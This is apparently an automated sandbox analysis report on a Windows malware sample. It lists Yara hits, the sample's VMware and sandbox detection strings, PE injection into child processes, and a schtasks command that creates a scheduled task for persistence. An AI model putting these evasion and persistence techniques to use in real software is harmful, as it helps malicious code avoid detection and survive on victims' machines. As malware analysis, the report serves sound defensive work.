                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: Mm7Yq5V7Lu.exe PID: 3024, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Mm7Yq5V7Lu.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Mm7Yq5V7Lu.exe PID: 6856, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.333245025.0000000002D2C000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000A.00000002.389397441.0000000002A3C000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.333245025.0000000002D2C000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000A.00000002.389397441.0000000002A3C000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe TID: 4612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe TID: 6960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe TID: 2064Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004096D7 _chkstk,lstrcatW,lstrcmpiW,lstrlenW,lstrcatW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcatW,lstrcatW,lstrcmpiW,lstrcmpiW,PathFindFileNameW,lstrcmpiW,SetFileAttributesW,lstrcpyW,lstrcatW,MoveFileExW,FindNextFileW,FindClose,7_2_004096D7
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeAPI call chain: ExitProcess graph end nodegraph_7-4475
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnkJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnkJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\desktop.iniJump to behavior
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: Mm7Yq5V7Lu.exe, 0000000C.00000002.419519188.0000000002EDC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00402765 GetProcessHeap,RtlFreeHeap,7_2_00402765
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeMemory written: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeMemory written: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeMemory written: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmpJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp9002.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmpB7BE.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeProcess created: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe {path}Jump to behavior
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000002.590269727.0000000001DD0000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 0000000F.00000002.589840521.0000000001C00000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 00000017.00000002.588511541.0000000001420000.00000002.00020000.sdmp, notepad.exe, 00000018.00000002.590937494.0000022DB8510000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000002.590269727.0000000001DD0000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 0000000F.00000002.589840521.0000000001C00000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 00000017.00000002.588511541.0000000001420000.00000002.00020000.sdmp, notepad.exe, 00000018.00000002.590937494.0000022DB8510000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000002.590269727.0000000001DD0000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 0000000F.00000002.589840521.0000000001C00000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 00000017.00000002.588511541.0000000001420000.00000002.00020000.sdmp, notepad.exe, 00000018.00000002.590937494.0000022DB8510000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000002.590269727.0000000001DD0000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 0000000F.00000002.589840521.0000000001C00000.00000002.00020000.sdmp, Mm7Yq5V7Lu.exe, 00000017.00000002.588511541.0000000001420000.00000002.00020000.sdmp, notepad.exe, 00000018.00000002.590937494.0000022DB8510000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
